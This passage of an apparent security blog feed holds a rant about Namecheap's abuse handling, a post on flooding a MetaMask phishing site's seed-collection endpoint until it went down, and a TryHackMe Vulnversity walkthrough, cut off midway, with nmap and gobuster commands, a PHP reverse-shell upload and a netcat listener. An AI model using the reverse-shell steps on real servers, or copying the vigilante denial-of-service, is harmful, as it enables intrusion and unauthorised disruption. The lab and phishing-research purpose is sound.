INTERNET state that a registrar should deal with phishing and malware associated with domains they registered but Namecheap thinks different. Their policy states:</p>\n<p> </p>\n<div><strong><em>Some types of abuse may not be verified from our side if we only act as a registrar and the abusive content resides on third-party servers. 
Due to this, we will not take restrictive action in order to avoid false-positive cases. This policy particularly affects copyright/DMCA, email abuse/spam, fraud, malware/hacking activity, etc.</em></strong></div>\n<div> </div>\n<div><strong><em>To expedite the resolution, we highly recommended escalating websites that are registered with Namecheap only to their respective hosting provider supporting your report with sufficient evidence. You might also decide to get in touch with the domain name holder directly by using the Whois details that are assigned to that domain name. If the Whois details are hidden by our </em></strong><em><a href=\"https://www.namecheap.com/security/domain-privacy/\">Domain Privacy protection</a></em><strong><em> service, feel free to send your email to the <a href=\"https://www.namecheap.com/support/knowledgebase/article.aspx/344/37/how-does-domain-privacy-work/\">protected email address</a>. It will then be forwarded to the real email address of the domain holder.</em></strong></div>\n<p> </p>\n<p>Basically, they are saying that as long as they're the registrar only, not providing the hosting service, they are not to be bothered with reports of phishing or malware or whatever else. They go on to suggest that we talk to THE OWNER OF THE PHISHING DOMAIN and perhaps <span style=\"color: #3598db;\"><a href=\"https://blog.syncpundit.io/metamask-phishing-site/\" style=\"color: #3598db;\">ask them nicely to stop</a></span>. </p>\n<p>This is Namecheap's ultimate defense.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/gaara.gif\" alt=\"gaara's ultimate defense\" width=\"711\" height=\"534\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>With this shield they can hide away from taking responsibility for all sorts of nefarious actors using their services. </p>\n<p> </p>\n<h2>WHAT ABOUT NAMECHEAP HOSTING?</h2>\n<p>NO! 
They do not care either. Whenever you submit a phishing site to them, either using their abuse email or Twitter, you are told to submit a ticket! </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/NameCheapTicket.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTicket-2xl.png 1600w\" alt=\"NameCheap Support Ticket\" width=\"788\" height=\"875\" data-is-external-image=\"true\"></figure>\n<figcaption>Namecheap Support Ticket</figcaption>\n</figure>\n<p> </p>\n<p>In addition to domain(s), url(s) and targeted website(s), you are REQUIRED to provide a detailed report along with attached files! You have to WORK to send a report to Namecheap. 
Not only that, they RELY on us to find and report malicious activity on their infrastructure - so they can properly turn a blind eye to them.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/NameCheapTweet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/NameCheapTweet-2xl.png 1600w\" alt=\"NameCheap SUS Tweet\" width=\"596\" height=\"720\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>Someone responded to this tweet with some domains, and this is the response they got:</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/namecheapTweet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/namecheapTweet-2xl.png 1600w\" alt=\"NameCheap Tweet Response\" width=\"602\" height=\"561\" data-is-external-image=\"true\"></figure></figure>\n<p>Yes! We are to open a ticket that will never be resolved! 
Like this one user:</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/5/namecheaptweet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-xs.png 300w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-sm.png 480w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-md.png 768w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-lg.png 1024w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-xl.png 1360w, https://blog.syncpundit.io/media/posts/5/responsive/namecheaptweet-2xl.png 1600w\" alt=\"NameCheap Does Not Respond to Tickets\" width=\"598\" height=\"538\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>It's clear that Namecheap has no intention of taking down phishing sites. They seem to have intentionally made the process of reporting difficult. </p>\n<p> </p>\n<h2>HOW FAR DOES THIS GO?</h2>\n<p>The National Cyber Security Centre (NCSC) <a href=\"https://www.ncsc.gov.uk/files/Active-Cyber-Defence-ACD-The-Fourth-Year.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"color: #3598db;\">named Namecheap the most popular </span></a>host of UK government phishing sites in 2020 with a staggering 60%! 
</p>\n<p>In 2018 they <a href=\"https://www.theregister.com/2018/02/07/namecheap_subdomain_security_hole/\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"color: #3598db;\">let malicious actors set up all manner of phishing sites</span></a>, malware delivery and command and control subdomains on other customers' websites.</p>\n<p>Just last year <span style=\"color: #3598db;\"><a href=\"https://www.zdnet.com/article/facebook-sues-namecheap-to-unmask-hackers-who-registered-malicious-domains/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Facebook sued Namecheap</a></span> for refusing to cooperate in an investigation into a series of phishing domains registered through Namecheap. These domains were clearly set up by the same actors but Namecheap would neither take them down nor reveal any information about the threat actors.</p>\n<p>Search \"Namecheap phishing sites\" to witness how ugly Namecheap's gotten over the years.</p>\n<p> </p>\n<h2>KEY TAKEAWAYS</h2>\n<ul>\n<li>Namecheap SUCKS!!!</li>\n</ul>",
"image": "https://blog.syncpundit.io/media/posts/5/namecheap.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Phishing"
],
"date_published": "2021-08-09T23:52:00+02:00",
"date_modified": "2021-09-20T20:14:15+02:00"
},
{
"id": "https://blog.syncpundit.io/metamask-phisher-plays-the-victim/",
"url": "https://blog.syncpundit.io/metamask-phisher-plays-the-victim/",
"title": "METAMASK PHISHER PLAYS THE VICTIM",
"summary": "A few days back I was having a fun conversation with Milan and Flavio and a phishing kit came up. Typical MetaMask phish kit, nothing particularly interesting…",
"content_html": "<div class=\"post__inner post__entry\">\n<p>A few days back I was having a fun conversation with <span style=\"color: #3598db;\"><a href=\"https://twitter.com/milannshrestga\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Milan</a></span> and <span style=\"color: #3598db;\"><a href=\"https://twitter.com/tr3sor_\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Flavio</a></span> and a phishing kit came up. </p>\n<blockquote>hxxps://www [.] back-metamask [.] com/register-login.html</blockquote>\n<h2> </h2>\n<h2 class=\"align-left\">THE PHISHING KIT</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-landing-page-2.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-landing-page-2-2xl.png 1600w\" alt=\"MetaMask Phish Landing Page\" width=\"873\" height=\"516\" data-is-external-image=\"true\"></figure></figure>\n<p>Typical MetaMask phish kit, nothing particularly interesting about it at face value, but I couldn't help feeling déjà vu. I started snooping around. I chose import wallet. 
Again, nothing particular, typical seed phrase harvesting page.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-wallet-page.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-wallet-page-2xl.png 1600w\" alt=\"MetaMask Phish Kit seed harvester page\" width=\"553\" height=\"699\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>I used <span style=\"color: #3598db;\"><a href=\"https://iancoleman.io/bip39/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Ian Coleman</a></span>'s Mnemonic Code Converter to generate a random mnemonic phrase and \"imported\" my wallet. 
To my surprise..</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-weird-wallet.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-weird-wallet-2xl.png 1600w\" alt=\"MetaMask Phish Kit Fake Wallet\" width=\"1087\" height=\"713\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>They gave me a whole wallet with all of 0 ETH 🤣. I'm still questioning this decision. From a design perspective, having a potential victim land on a page with NONE of their supposed ETH in their wallet is sure to cause them to panic. </p>\n<p>Anyways, going through all the requests I saw that they were sending the harvested seeds through to</p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] 
com/api.php</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-POST.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-POST-2xl.png 1600w\" alt=\"MetaMask Phish Kit POST request\" width=\"782\" height=\"256\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>I also realised that the POST wouldn't work if the referer wasn't </p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] com/wallet.html</p>\n</blockquote>\n<p>With all this info, I wondered: what if someone were to send a bunch of random mnemonic phrases? Even better, send LOADS of them at once... 
And \"someone\" did😅</p>\n<p> </p>\n<h2>DENIAL OF SERVICE</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-dos.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-dos-2xl.png 1600w\" alt=\"MetaMask Phish Kit DOS\" width=\"1050\" height=\"949\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>And the site went down.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-server-down.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-server-down-2xl.png 1600w\" alt=\"MetaMask Phish Kit down\" width=\"1078\" height=\"848\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>It went down for some hours. It came back to life with a \"new\" script to collect the seeds. It was changed from</p>\n<p> </p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] 
com/api.php</p>\n</blockquote>\n<p>to</p>\n<p> </p>\n<blockquote>\n<p>hxxps://www [.] back-metamask [.] com/apis.php</p>\n</blockquote>\n<p>A game of \"slightly alter the name of the script\" ensued. The phishers change the name of the script and the \"someone\" changes it as well. The phishing site had an average uptime of 5 minutes per hour. </p>\n<h2> </h2>\n<h2>TALKING TO THE PHISHERS</h2>\n<p>The phishers finally gave up and put up a text as their landing page. It read</p>\n<blockquote>\n<p><em>\"U ARE SO BAD telegram @ethpadpresaleadmin contact me\"</em></p>\n</blockquote>\n<p>Of course I reached out! This is how the conversation went</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-phishers-convo.jpg\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-xs.jpg 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-sm.jpg 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-md.jpg 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-lg.jpg 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-xl.jpg 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-phishers-convo-2xl.jpg 1600w\" alt=\"MetaMask Phishers conversation\" width=\"1080\" height=\"2069\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>\"Flap Jack\" asks '..Why are u doing this?' like they are the victim 🤣🤣🤣. Staying up all night for this paid off. 
Another one bites the dust!</p>\n<p> </p>\n<h2>PREVIOUS ATTACKS</h2>\n<p>I scanned the domain on <span style=\"color: #3598db;\"><a href=\"https://www.virustotal.com/gui/domain/back-metamask.com\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Virus Total</a></span> and <span style=\"color: #3598db;\"><a href=\"https://urlscan.io/result/8bde9120-54b6-4d56-a2e2-76b55635ee73/related/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">URLScan</a></span> and you wouldn't believe it!</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-urlscan-similar.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-urlscan-similar-2xl.png 1600w\" alt=\"MetaMask Phish Kit on URLScan\" width=\"1452\" height=\"537\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<p>This is why I felt déjà vu! I'd seen this before</p>\n<blockquote>\n<p><span class=\"text-muted\">hxxps://</span><span class=\"text-success bold\">restore-metamask [.] 
com</span>/register-login.html</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/4/metamask-related-on-phishfort.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-xs.png 300w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-sm.png 480w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-md.png 768w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-lg.png 1024w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-xl.png 1360w, https://blog.syncpundit.io/media/posts/4/responsive/metamask-related-on-phishfort-2xl.png 1600w\" alt=\"MetaMask Phish Kit on Phishfort\" width=\"957\" height=\"523\" data-is-external-image=\"true\"></figure></figure>\n<p> </p>\n<h2>KEY TAKEAWAYS</h2>\n<ul>\n<li>DON'T EVER SHARE YOUR SECRET SEED PHRASE </li>\n<li>NEVER FOLLOW A LINK TO A FINANCIAL PLATFORM FROM A SOCIAL MEDIA PLATFORM - ALWAYS TYPE IT MANUALLY OR BOOKMARK IT</li>\n<li><a href=\"https://www.phishfort.com/blog/staying-safe-online\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"color: #3598db;\">LEARN WAYS OF STAYING SAFE ONLINE</span></a></li>\n<li>INSTALL <span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/protect\" style=\"color: #3598db;\">PHISHFORT PROTECT</a></span> </li>\n<li><span style=\"color: #3598db;\"><a href=\"https://t.me/ethpadpresaleadmin\" style=\"color: #3598db;\">https://t.me/ethpadpresaleadmin</a></span> (Flap Jack) IS A SCAMMER. REPORT THEIR ACCOUNT</li>\n</ul>\n</div>",
"image": "https://blog.syncpundit.io/media/posts/4/metamask-landing-page.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Phishing"
],
"date_published": "2021-08-04T19:36:00+02:00",
"date_modified": "2021-09-20T19:59:22+02:00"
},
{
"id": "https://blog.syncpundit.io/tryhackme-vulnversity-walkthrough/",
"url": "https://blog.syncpundit.io/tryhackme-vulnversity-walkthrough/",
"title": "TRYHACKME: VULNVERSITY WALKTHROUGH",
"summary": "With the machine spun up and ready, let's get into it! We are looking for open ports. My favorite and go-to tool for this…",
"content_html": "<header class=\"major\">\n<figure class=\"is-loaded\"><img loading=\"lazy\" style=\"text-align: center; color: var(--text-editor-body-color); font-family: var(--font-base); font-size: inherit; font-weight: var(--font-weight-normal);\" src=\"https://blog.syncpundit.io/media/posts/3/lets-go.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/lets-go-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/lets-go-2xl.png 1600w\" alt=\"Machine Information\" width=\"1209\" height=\"464\" data-is-external-image=\"true\"></figure>\n</header>\n<div class=\"post__inner post__entry\">\n<p>With the machine spun up and ready, let's get into it!</p>\n<h2>RECONNAISSANCE</h2>\n<p>We are looking for open ports. My favorite and go-to tool for this is NMAP. 
We'll scan using</p>\n<blockquote>\n<p>nmap -Pn -sS -sV -T4 10.10.238.250</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/nmap-out-2.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/nmap-out-2-2xl.png 1600w\" alt=\"Nmap Output\" width=\"1141\" height=\"390\" data-is-external-image=\"true\"></figure></figure>\n<p>There's an \"Apache Server\" running on port 3333. Opening 10.10.238.250:3333 in the browser takes us to a web application.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/vulversity.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/vulversity-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/vulversity-2xl.png 1600w\" alt=\"Vulnversity\" width=\"1156\" height=\"827\" data-is-external-image=\"true\"></figure></figure>\n<p>We'll look for directories and input fields, more-so uploads, for reverse shells of course! 
I'll be using gobuster for the job.</p>\n<blockquote>\n<p>gobuster dir -t 10 --wildcard -e -r --url http://10.10.238.250:3333/ -w dirs.txt -a \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0\"</p>\n</blockquote>\n<p>We found an interesting directory \"/internal/\"</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/gobuster.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/gobuster-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/gobuster-2xl.png 1600w\" alt=\"gobuster output\" width=\"891\" height=\"348\" data-is-external-image=\"true\"></figure></figure>\n<p>Opening it leads us to... wait for it ......</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/upload.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/upload-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/upload-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/upload-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/upload-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/upload-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/upload-2xl.png 1600w\" alt=\"\" width=\"598\" height=\"360\" data-is-external-image=\"true\"></figure></figure>\nAn upload 😌. For this one we'll go with a php reverse shell. 
I'll go ahead and grab it from\n<p> </p>\n<blockquote>\n<p>/usr/share/webshells/php/php-reverse-shell.php</p>\n</blockquote>\n<p>After this we edit the IP and port and set them to our attack machine and a free port. </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/php-rev-shell.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/php-rev-shell-2xl.png 1600w\" alt=\"\" width=\"642\" height=\"306\" data-is-external-image=\"true\"></figure></figure>\n<p>Now we start a NetCat listener on port 6996 with</p>\n<blockquote>\n<p>nc -lnvp 6996</p>\n</blockquote>\n<p>A lot of uploads either filter out or expect specific filetypes so we'd have to make a bunch of copies of the reverse shell and rename each with a different extension, to test which ones work. I'm lazy, so I'll use BurpSuite instead. 
I'll use</p>\n<blockquote>\n<p>http://10.10.238.250:3333/internal/</p>\n</blockquote>\n<p>as the scope.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/scope.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/scope-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/scope-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/scope-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/scope-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/scope-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/scope-2xl.png 1600w\" alt=\"scope\" width=\"614\" height=\"198\" data-is-external-image=\"true\"></figure></figure>\nWe'll use the intruder to test the file types. Leave interceptor on and open the inbuilt browser. Paste the url and load the page. Go back and turn the interceptor off. Try to upload the reverse shell. 
\n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/upload-rejected.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/upload-rejected-2xl.png 1600w\" alt=\"upload rejected\" width=\"574\" height=\"323\" data-is-external-image=\"true\"></figure></figure>\nHead over to the HTTP history and find the POST request.\n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/http-history.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/http-history-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/http-history-2xl.png 1600w\" alt=\"http history\" width=\"706\" height=\"321\" data-is-external-image=\"true\"></figure></figure>\nSend it to the intruder with CTRL+i. 
